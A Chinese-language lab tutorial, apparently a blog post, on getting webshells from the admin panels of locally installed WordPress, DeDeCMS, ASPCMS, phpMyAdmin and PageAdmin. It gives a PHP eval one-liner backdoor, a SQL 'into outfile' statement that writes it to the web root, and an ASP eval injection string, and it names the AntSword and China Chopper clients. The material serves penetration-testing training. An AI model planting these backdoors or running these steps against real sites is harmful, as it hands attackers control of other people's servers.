一、wordpress
安装环境
首先我们在vulhub中启动我们wordpress的doaker容器

然后去访问我们的80端口

然后选择简体中文进行安装

然后就可以登录到我们的后台界面了
后台修改模板拿webshell
进入后台,我们修改一下404页面的代码,添加我们的一句话木马


然后保存,拼接路径去访问一下404.php页面看一下有没有解析我们的php语言
/wp-content/themes/twentyfifteen/404.php
可以看到我们的木马被成功解析,接下来只需要蚁剑连接即可

上传主题拿webshell
首先我们先去主题网站上下载一套主题,要注意大小不要太大

然后将我们的一句话木马添加到这个压缩包中

然后将这个主题上传


可以看到上传成功

然后按照上个方法拼接路径即可

然后就可以使用蚁剑连接了
二、DeDeCMS
首先安装好我们的DeDeCMS,找一个压缩包解压到网站根目录即可

访问我们的网站,按照步骤教程安装即可

通过文件管理器拿webshell
登录后台管理界面后选择模块--文件管理器上传我们的木马文件
<?php phpinfo();@eval($_POST[cmd]);?>

可以看到上传成功

访问我们的一句话木马,可以看到上传成功
蚁剑连接即可

修改模板文件拿webshell
按照图示内容修改index.htm文件的内容

在文件内容开头加上我们的一句话木马

然后去修改,这个位置的内容

修改为,图示内容并保存

可以看到我们的木马已经被解析生效了,接下来只需要蚁剑连接即可

后台任意命令执行拿webshell
首先来到图片位置,添加一个广告

广告内容写上我们的一句话木马,点击确定保存

回到广告管理页面,点击代码,即可看到我们广告的路径拼接即可


查看页面源代码即可看到我们的一句话木马已经被解析了

使用菜刀进行连接即可


后台SQL命令执行拿webshell
找到图示位置

在这里我们可以利用into outfile来写入一句话木马
select '<?php phpinfo();@eval($_POST[cmd]);?>' into outfile 'E:/phpstudy_pro/WWW/1.php'


然后去访问我们上传的路径,报错的注意要修改一下my.ini中的配置文件

可以看到我们的一句话木马被解析了,然后蚁剑连接即可
三、ASPCMS
这次我们需要在iis中进行安装
找到我们iis的根目录,将我的ASPCMS压缩包解压到根目录即可

然后按照步骤进行安装,安装好后访问我们的后台,注意后台的路径,然后登录即可

后台修改配置文件拿webshell
按照图示找到位置

然后我们点击保存进行抓包

修改一下图中所示字段

修改为
1%25><%25Eval(Request (chr(65)))%25><%25
然后就可以根据以下地址进行菜刀连接

可以看到连接成功

四、PhPMyadmin
首先我们在小皮面板中安装一个PhPMyadmin

然后去访问,登录

通过日志拿webshell
首先,点击变量然后搜索gen
然后将图中所示的两个值修改为,这样就可以将日志写入我门根目录下的1.php文件中

然后按照图示写一句话木马,点击执行

然后去访问我们的1.php,可以看到我们的一句话木马已经被解析了,接下来蚁剑访问即可

导入导出拿webshell
在sql命令执行栏中输入,即看到数据库的地址,这样我们可以判断网站根目录的地址在哪

然后运用into outfile将我们的一句话木马写入网站的根目录中

然后去访问我们的2.php,可以看到一句话木马被解析,然后蚁剑连接即可

五、Pageadmin
仿照上面的步骤解压到根目录即可,注意这关需要使用的是sqlserver数据库,需要安装到iis中,选择存在的数据库名字


安装好登录即可
上传文件解压拿webshell
注意这里要上传的是压缩包,我们需要将我们的一句话木马添加到压缩包中


上传之后解压即可


然后去访问我们的1.asp

使用蚁剑连接即可

上传模块拿webshell
按照图示即可上传我们的木马文件的压缩包,但是这里需要授权
